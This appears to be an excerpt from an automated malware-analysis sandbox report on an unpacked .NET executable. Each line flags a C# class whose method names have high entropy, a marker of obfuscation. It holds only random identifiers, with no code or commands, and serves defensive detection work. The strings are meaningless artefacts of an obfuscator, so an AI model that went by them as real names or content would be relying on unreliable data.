Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, JEOerP8kDt2xBa2yfBA.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'GK19j946Je', 'nMFmWg3YjF', 'Et89savD4W', 'iHbm6KbyRq', 'lK69HwSeTHPQaDKRnKY', 'nSNrK6SqKQCmXP9VoN6', 'EWgdANSVci7xqdJF9Et'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, R93DxcAN8PkYMuX3eFN.cs	High entropy of concatenated method names: 'xmAGJtIir1', 'Tc5GDcmNRE', 'vhZwnOoC2J8VLf7w6Mu', 'lJI38moXlZuOyhAAj0f', 'hw9hFwoBvgldapJChSt', 'cN4g53oSDVFW6YOIwFF', 'XFT2NhodvUWFOM4i6Ov', 'AgOK1Joc6SekFipvYfx', 'WHyAJUorj0ebM5gbWBY', 'rOqaREoh49mcuRq1geD'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, HEs9RxUlVbYvLrT8s3f.cs	High entropy of concatenated method names: 'pQOAZWn39l', 'K69bZi3yDmnsgmaQbND', 'aLS5Zi3WxYuoYBmpKmu', 'kab0yi32NoG1slrZarY', 'cvQr5P3nNWOTuyfDMn2', 'GQpMkD38iQeSHaEfWS0', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, HXuwlHAwDEY13ZhxXNl.cs	High entropy of concatenated method names: 'RoU874phOW', 'LSH8PKU4td', 'wW7PEUQg1Ec39Gx7xeP', 'Q95usPQUaOOAfhEVU9E', 'O0PGSUQME9ZiefutEQY', 'dGGPyYQ9VIYswmMJ7EW', 'hwNJNkQB36IG61WCFU0', 'rumaJyQSi0FkegFZTVf', 'ydeeZgQCm4aBHDZTxdC', 'QWRSgvQX8sdfEQ8jZBk'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, k5a0UqUg9iAK268yr4q.cs	High entropy of concatenated method names: 'GSPAjO5nLD', 'J5JAsubkcZ', 'MaTndxa3agx7VBMIngL', 'EgiRWJatI1QyTWWEFsg', 'YgYRjyaalIheTBDyhke', 'orKLDkaLc78BEbCi5Du', 'p79y8taGEmeLXhVGaFm', 'sa2T4OaQvfFMjF0RqaO', 'JAhviqaolcfhVeyFw6p', 'PX4yHvaYMOwCYj7ftXl'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, q2OGlLbfwHxp69PnIAU.cs	High entropy of concatenated method names: 'FmApeM3ZM5', 'YxJpouF4ngakHpDE0rU', 'Xhwaq0Fk2q6SRUvIBXu', 'kJJWRjFrmnUTfHsh9Lv', 'Bj8VhiFhE7quoR8d3wq', '_1fi', 'TTDhkb3Hev', '_676', 'IG9', 'mdP'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, YxJuvCUuuX7TEuF0PKs.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'mL2374yJDpCHx4HLhio', 'QEc06FyO1vUAMLdvIZm', 'z5ndfIybOFqBeSiD83O', 'sn1SmRyKjEnZID90obS', 'Dw2qeuyRuRVTRf13xaL', 'UJRm04yANDVPvbeo9by'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, AlHq8iG6Z9Dsuh8LVOx.cs	High entropy of concatenated method names: 'bLAD70IFVe', 'dO1DtQBJFd', 'KIqDVZQh10', 'r03Df4SAqb', 'efrDeJBA5q', 'NVGDyKLFxC', 'CnmD5jiyaU', 'SniDq8QBPn', 'LOgDH3VpE9', 'kOFDndTXSH'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, itPvGsU0lOKDkXrkoBc.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'P3NorfaMdaHaJPTUOME', 'JxQEHca9PvXtbCGNRBE', 'vyiO2gaBjMWt2dSfd9A', 'JBXaQSaSs9MMhdpUWb7', 'pMIexwaCbasHo0Pnl5c', 'GIUiQeaXqjDcCNaVFp8'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, eAUfluUtKQo4wAKBFEq.cs	High entropy of concatenated method names: 'bilU6Tj0Kr', 'x1vMeZtC5HkVwTwnEqQ', 'xpvtdWtXDWN1mbx6Yyn', 'iCrZYAtB2GL1dYmsF1g', 'eI93ultSH5ceXEOU9N0', 'kBjLmLtdUZuTDgYs7rU', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, IywSKe89iJEdGnI50Xx.cs	High entropy of concatenated method names: 'HsiEXQneTp', 'i3lEtdq60n', 'XvYEV8YWJv', 'KIcerqMQSP9V2ifQ5jo', 'VpMdbWML6K57E6lPuM0', 'r5d0DfMGDBj8nF8o338', 'D8KgaDMoswhHeKDcrPP', 'DyJET5FZjm', 'P0xE2hyqvY', 'kseEw25wVI'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, XZjvmxuPL8t6StC6aFq.cs	High entropy of concatenated method names: 'Os74hTuWOM', 'K6y4piJpWI', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'krn4iER8Jh', '_5f9', 'A6Y'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, eU4tXrA5C6gTWW2Ynru.cs	High entropy of concatenated method names: 'sykbEMIvbB', 'nWtba3ZYtL', 'pnPl8kDp46O0C33Vd6O', 'WrJUe1Dw76nP2rkCfMY', 'Udmp65D7H1clTquB5Tw', 'cTJ3hMDsQHbt548aSX2', 'xaebw30lTU', 'Two2kxj046MCoK0cRoS', 'kGw0Jej1nO1HeF6qo64', 'zFZAMNDuPyoAIjOA9aW'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, mj227cRj8A3y4o2S13Z.cs	High entropy of concatenated method names: 'kGA25CRRRMx3t', 'XV0pk0JoJCCs1fx8wv1', 'Dgwl0WJYruljZQB1ACH', 'cuMOvnJZ91Qj0tkIlB3', 'ONnXOeJDl4vcRTmJ4iU', 'Y6WvdqJjy3085SDxtoY', 'oWg8SRJGOKlvkrMS9Rl', 'NN0TLXJQHTaKhn8LNjV', 'c6VeZkJgFAClAp3934P', 'A7PFDLJUZFSM8tGtGhV'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, VDfCyH7APCVBLC5dYR.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'FYvtHdnswtDiMWJx02B', 'v2p2i2np3kPEoHY5oPo', 'oeep4jnwc51Ol2h9Zkp', 'T3d0lKnIOfv2cUgC3OQ', 'w0cLQZnmBLAIIfumZXQ', 'GVUtdInuDJVoKQCR3Nu'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, CY22RMbp2PkA05dAeup.cs	High entropy of concatenated method names: 'a3TCal6ejM', 'qNaC94gbqa', 'mSdCjqpR7f', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'hFACsGDxyv'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, DH1auIupTlbYd5xvqhN.cs	High entropy of concatenated method names: 'OxoOFeOJcP', 'nqiOWSWRu1', 'cNLOg9WrbA', 'zCoUU9TEVkaa54BdhPS', 'NVyoLJTi1neSAQbZ8AA', 'kf3xKsTlayo9s3lFooD', 'h2ytuMTV8hFB9GjqnH1', 'pBUFwLTT0i4vAFjobfn'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, OdUSGZU84AlIySqCtFW.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'wuAfxEy4ui7vmfLeHJZ', 'vxRalbyksewTY8uucfq', 'yuiTZtyNdo2SUwwZuaF', 'D85NOLyiWOW0lhmfIsC', 'ppRp4yyluLEDKO1SWGL', 'LV0gd8yEF9RVqcUMo5G'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, t6GnjM6Lw4cUilTj0K.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'uPMufCnrrb9hxtZLKbT', 'KcdmZ2nhb2oWuVfZw06', 'JimR9kn439Nyjcahg8e', 'qIQ6sjnkOcpVqN18pc8', 'UTjUHhnNkrGTxoLoAQr', 'kDykvqniL2rrVbjf5r4'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, q1bKOkGjYYDEYpJcbja.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, MRtxTbU4IHxqHWIJycW.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'qlpXaL8Oawty4VWxaWI', 'nPftP18bFHPSQmKu6DU', 'cLekAa8KHGaSlb4DX7s', 'Fuc4EF8R8P2iGcunmWk', 'W8xZKd8AiMOu8fiOyvh', 'sWQ1KS87kpqUB36HXEl'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, TjaH4wbSGYD88x3vdmX.cs	High entropy of concatenated method names: 'gan4Wj221c', 'k034gquEPX', 'eAU4o2XNDW', 'RdU40lfTXG', 'vmI4QdFibx', 'QuL4kAibNn', '_838', 'vVb', 'g24', '_9oL'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, rmcnHdGCa7cPT7nVuSw.cs	High entropy of concatenated method names: 'RKcJXHqLXy', 'Vq3Jt03aQt', 'wpdJVoAFks', 'p50JfwVrNl', 'shrJegTs4g', 'uAas9vcgjsOYt6jAjnm', 'aLcg6ZcDVq8FT0e1R9E', 'KB0jhscjNSKJVGeuadx', 'DdQ8FfcU3XnngGEy9Wk', 'Tjbj1RcMJ97o1q3lFGQ'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, y0segS8HYZmb3yHNnWb.cs	High entropy of concatenated method names: 'sg9', 'cLrmbTB3vU', 'IMQa7Fir9w', 'VH0mna2WhF', 'w0RnicBb6VgQ4nPEpO7', 'fet60gBKwl58GuWRUNw', 'WfoQh5BRI4pCQVlhHpM', 'BDTgBABJtAmmwIZmTZt', 'l9URouBOU9dNMintOu2', 'Oixa63BAqe8GCBM0XDI'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, AAUTUO80JNafJFI4qXp.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'aR2m1CVq28', '_168', 'P3HybkSXRRdfrqTiuD3', 'jHTFOqSdXss51h1HoMu', 'VIC0FiScVcTG8VCWAfu', 'y6J2VBSrFqZmo0PeJha', 'Tj9cCuShHNE1Yh6ONBE'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, bIdrgpADQX79vaDXP6W.cs	High entropy of concatenated method names: 'Pt38lPrZSk', 'g3rOyyQfvFeV8sf9dM9', 'Gc65P1Q2HjNMPQI5V1t', 'yKot9XQ19kPWuycfI6o', 'oGHt2WQHtYGlQRj1DdH', 'OZxdN5QnfnWF314NXCq', 'sdPWupQyewTEmqDfwSn', 'xyrMsMQWlxAaLIkjJ93', 'Yr6A5kQ8B7EJOhWT5rK', 'HhARvtQP7jl1PEU5l7R'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, r9iF2QUqZip0CUTJLWb.cs	High entropy of concatenated method names: 'bPCAUVBLC5', 'vYRAAQLkpk', 'OTiA8ZVonT', 'utcejJtA2QWY7nYFcBc', 'eBd9RKt74xdqxDCqWO0', 'sYxmtAtKwtEr1HRkLeI', 'uy4lyQtR8QHZnXLXi4q', 'ICMcHKtskC44HpTmlaO', 'lbr9bDtpg0ArYn5DByn', 'mYjApdtwQ7P6jlbUS2o'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, OsCdkruChFOEk35trLP.cs	High entropy of concatenated method names: 'H8EOygM9Nd', 'r24O5jgBst', 'blCOqhhhgr', 'HunOH8RdEI', 'v8FOngeKvQ', 'QuhnxkTrhkVW6aQKq2W', 'vHt3C0TdQmtrD6Ksa4p', 'SEEK87Tc1dq8XfugDVl', 'XRuCkVThDltKHn4no7C', 'oiPc8UT4XZl8QX9hDZL'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, P1rf22b4VYD7Z66Ayks.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, fqKhoZ8Ge5T4fjEyanR.cs	High entropy of concatenated method names: 'iRVRHhNcWA', 'EhlRnJIBnx', 'WQ2RFD5AlI', 'nsGRWJO7MK', 'b2TRg0rsND', 'lwVRoLPFQo', 'ckh7vLghyoZ6GNoBUc4', 'J0eZ4QgcYKdEjemi6fE', 'z1DDkWgrFJ5wHDasyJv', 'dQWhfDg40DLdHo0KEHQ'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, ulIw66Ap564hpWXdSIF.cs	High entropy of concatenated method names: 'xgYG7Y23D9', 'O53GPjjViH', 's09Gz3Dxc8', 'YkYuSMuX3e', 'NNeuUbCJk9', 'ihruAmbgve', 'yxvu8fNan1', 'vfduGwTk0v', 'cxDuuPiKyM', 'p7U6epYpBWkomNSY3IA'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, qrb53b5sBY44QqLmBV.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'fDG67Ffw3c5hlaQvdaa', 'rJZ9WDfItPt584t2n6x', 'FJhANtfmlG2AMw8hTVg', 'PHoSvxfuMB5175WlMcI', 'TpjsD9fzhoV2t2hWpg6', 'M9366P20UuK2mqMtEGi'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, BneUf68BoaavP5NnR3W.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'h4boF8BG7cXiMju3AH8', 'QtvZ3KBQenZpogFd7Yv', 'UM7N55Bo7TpeNOUjRHP', 'yuilUhBYTveWcwZVw1a'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, vYT4960cw0yrW5KBRi.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'pp3XmxnyKOqRGYCv5R7', 'DxW52YnWjitdiHqWT2L', 'rbqc5Xn8sgLXrPgfHmX', 'AotWTlnPRFBSDaI5Ctm', 'olWnw5nto7h8XQ3IXB7', 'U4ctCRnaaifbyPuskDJ'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, ss18V9Atprs2jBZZXPu.cs	High entropy of concatenated method names: 'XNsui18V9p', 'eaHeIHZmLFATHhr0eEf', 'OBlOcgZuw3wUovFlHgJ', 'LGgaKCZwSf76LFHfMKa', 'Y8knOdZI7ViaeDDMgBe', 'GqaG8VZzcCwlnmXuOgP', 'c6nlpVD0Wicg97csRku', 'aX1gZ7D1lKHyepEdHkg', 'SLLK7RDHZ5vpadiWZsd', 'fysUNEDfVV74qKwAo2G'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, TxIfbCFjIkBRXRny6V.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'UYOJPo2DbDrPNnVlQhA', 'mRghO92j1Bo1SngEmu3', 'zyWHPF2gmjJrMou6RX8', 'VqF8JJ2UvlRLAuSdK4d', 'E34h8E2MdkfmQnhacT3', 'pFZvv729I7BR3wAT9Sb'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, eFt4kjGlMUJtS48096m.cs	High entropy of concatenated method names: 'X84T4asssx', 'k7bTCwwYgC', 'CtZTJ5kZvm', 'n7ETDvsUFX', 'EHDTTWu4vh', 'VkbT2vrN3W', 'pV0TwHZW5t', 'mKnT1TXVMC', 'KxATmubJjx', 'PKXTZZP380'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, CmIiaH81SoSR1l121c2.cs	High entropy of concatenated method names: 'WYDELEYpJc', 'fjaE6qIDAC', 'ifgEvUtflZ', 'GxSEltAXEc', 'RQMEYLosRk', 'XDxClB9yOId2SftxQXZ', 'ptBKPn9WXGvbQjJ9GP3', 'hkShF892HlBRKpZ70Xt', 'ovvXV29nIlas9nvldvE', 'iyIMQs98lkhpjXVl3x1'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, idGPnAGQhvaPhd1o8Ns.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'oS1DT3ZeGt', 'CBvD2kqTTI', 'r8j', 'LS1', '_55S'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, kydTtGUUkpqWd1NitMX.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'iDMYSZyg3N4VIR8OE03', 'g2TIdpyUlhiDbnChYj1', 'w3EC6kyMKpSDf6A9qfn', 'BiQDxty91yAns65hht2', 'qykFQByBoLcbS5VmacF', 'eWl2t2ySg7fFfSR6HME'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, ljYUn0bBHHOJ4rgQ9mr.cs	High entropy of concatenated method names: 'GoAxN9tAkC', 'FUrxM70yxW', 'ajIxB2Rrxd', 'kUGx3KSt8D', 'Nc6xdPomT8', 'XFcRUBvIdPHI0aVC0TX', 'bAeMYYvmtaAIXBfVkYZ', 'FLJu3IvuMEeEWCT6dOj', 'I5RgWNvzcJq3TIq6HxT', 'dttcB850FnhHQQOJYY4'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, P9Wo0B8UErUwIL1FO2D.cs	High entropy of concatenated method names: 'nEORijZZYi', 'jU2RIMxo9r', 'JUTRKD2TmK', 'sKNRrhpvtO', 'DYWcIJjzQ7CepTwtKMg', 'G9MARTjmUOaopAfHxLL', 'rNHeUDjufXnmBpwN32n', 'KjQ98ig0gxZBJRKfSJQ', 'PjdnEog1TQuKeRhKmWt', 'dfa8XAgHByvBTYlSjcY'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, rk4L9yGuc7vOOZkKDXT.cs	High entropy of concatenated method names: 'lbUswGeCcG', 'R1g7RnXjMPKVMASve8j', 'g7Vy0IXgFI9fO9RFdrc', 'OFEP5OXZvdXbuGBH1HY', 'VNEOpeXDGKGkBCkwVXb', 'k3s9I1FWJS', 'Rkh9KTePvD', 'HKS9rZYPuT', 'a549XjLTdj', 'nSN9tobjbO'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, GIir1kASc5cmNREY58W.cs	High entropy of concatenated method names: 'mSsA4CcWpP', 'pqwAxAqMrO', 'VcMACQUq1X', 'bmtTIg3idbNko8CtwMM', 'VNtN703lY3qoldilnAx', 'qc2Lnq3E7eDFYRTfOwJ', 'wsulqX3VmVKty2ZRY79', 'WxRIZF3TT4pFZqtfZXj', 'Q68C263e1GaADWVlsEc', 'EsNhPh3kEo5W8t8kxHG'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, YR8FR0eUFnggKmYp3a.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'VIMnoIfVMDoNEMmkhCH', 'ceVo0dfTkd0JsIr3u3k', 'SNVKPIfeppFqwlrul3F', 'UXf1aVfqHoD7CnQSv0O', 'C9yc19fvStsqy2Uim19', 'Ny1wZ9f5uGSifBK32I4'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, VU0LLKuLZtHuWiRYTwQ.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, EBArA98FHGcADjIMEiQ.cs	High entropy of concatenated method names: '_5u9', 'k8OmuFEfom', 'lyl9S8x9bJ', 'K5emIgkdui', 'd3BiUXBIq7AdDbkjrwO', 'pfKP1EBmq8vTo9sYtTw', 'pOKfdiBu6Vk5w6QGYf9', 'KIwGklBpGdKB9Zyerep', 'lExwODBwmYAE5F0NCkW', 'voctQsBzDmusxmKFsZT'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, rhxXDJUawq3adVOFOas.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'Q08oApWW10VnnDCG3Ek', 'zHf5ZQW8OZSA8SATjlB', 'PV56e2WPusZDjmue2og', 'Ud1CugWtGZxDW0tFgcy', 'K9bQVGWa981dNOEET6b', 'gOFVN0W3fGYPp41kpuD'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, rwfZ7AAeDrUs4Z4nr04.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'qqtutjPv53', 'syKuVoZwfZ', 'XADufrUs4Z', 'xnrue048YV', 'FBRuydXMu5', 'a7VbKQDP7x0etBLZgPB', 'mgYPrFDtVYwxbTinY8w', 'MeHlLrDWZEZF8E8kOvd'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, qXCePBUZ5UWKgCYaRC4.cs	High entropy of concatenated method names: 'yZuUi9OsZq', 'NHZlYU8DQEOL8khqSyv', 'lU9tGc8joGDCN4PKviw', 'HqTwob8YNMSqIs1GJAr', 'pb26od8ZQ22cwV0kqJT', 'EMx4QH8gtIhA4dmne1E', 'hp0hOu8UZAtiVmpwAma', 'Bg17Vg8M0JQS4j2vGUT', 'Y878SU89bDrskQko9be', 'f28'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, ruDoRpGMaSf6l5O45Dp.cs	High entropy of concatenated method names: 'JHKcXx95uC', 'P9CcthNNXu', 'AOFcVU3RT2', 'wWQcfruDlB', 'yDdceOe2IE', 'Isa4WmdEOjb3sxqkGgs', 'oSWcApdV9050RKOWoPl', 'nPaOVNdiEAaN3ymgrig', 'ikfEXvdl15HIvTbrH5x', 'q2qXyEdTDKBfVrwiWdo'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, bvEVVm82M6xNXDmHTS5.cs	High entropy of concatenated method names: 'VT7E0dyyHI', 'naaEQEZ09l', 'M31Ek1bKOk', 'gbByWdMJwENKAWl4MsX', 'uklvHGMOoRgaVQjyJVJ', 'pxmoXHMbY9UJhmVtaHV', 'DsbviCMKireJCbArJPL', 'Ha2D5HMRxQxJFpUWybu', 'de6cGaMAMXP4fLts2h7', 'p0ARTqM78SPWq4EbLbJ'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, N39lIAURboVWlk56Xvu.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'vMySSqyphtssiqbWGQL', 'iPkb1Qyw0J9IMxXwxGu', 'Gxj6s7yITcb7DSpTovO', 'A3G56tym9nQTeGlk8qh', 'xm9MP0yuK2xVE5G1dYY', 'I5GfXfyzpuRV7bIyONM'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, SBupJPUeMgGgnJCGJ2i.cs	High entropy of concatenated method names: 'XwrU7PuBSO', 'neItf8tTdWtiyy1a3VR', 'sjf8rvteSQ42YbG6egJ', 'JX1wlotEQXZLxeM6Dbl', 'zy3I1ItVkmVgLvBseVL', 'TQ7kYmtqUO74fY9m5EW', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, qigR97Z5y4cobjd19U.cs	High entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, EGcsW1bQABVG1FKGpg9.cs	High entropy of concatenated method names: 'nRKi3tv2WM', '_1kO', '_9v4', '_294', 'RPrid6Q9Q7', 'euj', 'cyFiOyX9Yt', 'LZEi46nAo0', 'o87', 'zmmixYANUq'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, qMRAQKbKqGjBL3HkWjh.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'yVHC40JGcI', 'l9VCxHWVCG', 'vcTCCB2COc', 'muMChoLeXQ', 'iRZCpvhVju', 'LbcCiERN9l', 'KcWnkL6T0gdZHQTHi9u'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, xptL0TU1gACc1YQbk42.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'Caxy1N80m2FGMC6T5iU', 'pldi9B81YSRe54FbFi9', 'nAf8LD8H67EVEYqNut0', 'SDe56U8fCgThXR3TWkx', 'NFSBCV82rlKC3BmK9rJ', 'NPErVJ8nUr4eITTxHtu'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, e8wI8JGOlgOiXtw1SWW.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'PZNJSStZGw', '_3il', 'fs0JUwgTRa', 'FLpJAGaq7O', '_78N', 'z3K'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, BKyM6qA3CMDZI2XpkhM.cs	High entropy of concatenated method names: 'gZEGMSSsvc', 'brvGBGGdja', 'zpbG35wXw3', 'icGGdDkOFp', 'e7fGOsjKiE', 'DGMD7LY0GrXC23Rg1FR', 'Ttiy4qY1wbyA7T6FKts', 'WObDuhoubRDHZeeGmqE', 'hhpJCMozCpFkvmT3BMV', 'AJCGHNYHpYarVliprDD'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, lZyMQKRJJJUZvejocj8.cs	High entropy of concatenated method names: 'qdr17SJdeDCFHnEV0VV', 'pE9YF6JcP2e1ha31r1x', 'kOZ0XNJCqKFZS6lasBo', 'AQELVVJXKAfPJvdIwGX', 'I9PKDHl07n', 'teg8ckJ4OVdMbdsWeGp', 'GnFQtUJk05qFcK3N3Q2', 'oajtkcJNsOwil4fq2Ib', 'wGeyVsJipVEldBLZJvO', 'XBeAOsJlWoBGU2Epf22'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, tXupOFbdU3RT2dWQruD.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'AvJxOXRygE', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, roo6xZHu9OsZqTNNIj.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'Q9QCkg2aahi3NadY554', 'MbPIPy236ToLerTP44M', 'iwW6R52LLbmjDsifjdW', 'XEsmpx2G4oWJ3wlZk3h', 'fGtVN42Qy7UIpKMsjFI', 'nJDAnJ2oRhBqwbvDlRU'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, SHCRr53hFb5iM2So2H.cs	High entropy of concatenated method names: 'Y5bOsy249', 'QCe4FTgD8', 'PsvxAqGkx', 'QBQCor4qG', 'NYDh5G024', 'H8wpJrVsC', 'ASdiJJDB1', 'ixvfZf18DkbxEixGBrp', 'dSxx7p1PQAtIJA7eYHu', 'AASRZD1tXXXXytGHawW'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, WLbyvMAARYC7bW3lBLm.cs	High entropy of concatenated method names: 'v1pAo3rAkH', 'TqmA0XCePB', 'KUWAQKgCYa', 'gC4Ak1XT5n', 'CuQALCUcR6', 'Kc7A6XQHY5', 'xmH6kJLDlqPwEUX4HvL', 'MUQtIpLj1B4kho0EcQH', 'drKHeoLYY9lVMc5d7NI', 'iLZkDjLZMPEfoKdSFLD'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, RuBSN3glxnUHmQREgy.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'OQ9up12Fefu9nV4Fj11', 'IRCfbR2xpaddmOvDhod', 'tYH9eJ2JpclaqDbsaOE', 'Mk03VB2OCoYaNd7N3tc', 'BX5x9e2b4o5U7FJTaxi', 'VLOgH42KrhKTQLnYooL'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, ICQukAbCXMKkoJVjSjy.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, exYD6WGms3HJyodBPv8.cs	High entropy of concatenated method names: '_7zt', 'S7GcZRKkps', 'KjycNL2EpR', 'HpxcM8CEWl', 'UEycBqmRHU', 'kulc3RkjCc', 'ynVcdFiPFq', 'ljZNihdB9Zpjpx5HQLx', 'fNjuf1dSgxCGjnRlCPh', 'oyQskkdMhvuxkYDLcsn'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, B8IuIiUdb1SexKlZ2kn.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'iEeVgR8E3cTcnlLHTGi', 'SAy0rn8VIZh8AY8y543', 'jnMshx8TurL8YsfxAv5', 'W8ZXFY8epnu32WEyPXK', 'ASNDik8qS3oSWoscpJR', 'cn5rr88vkqMpLkQ5bCB'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, JJj7UlXBdU3QPGHnev.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'rH0n4u2M4', 'vvhb5kHECKyJYxN973V', 'yBAg83HVbY0fbJL7Pq6', 'b2FarhHTsB6N4U8dQI0', 'bYA5JmHetDtnJUgJMTY', 'FTKkwSHqxsiMpN7t1PC'
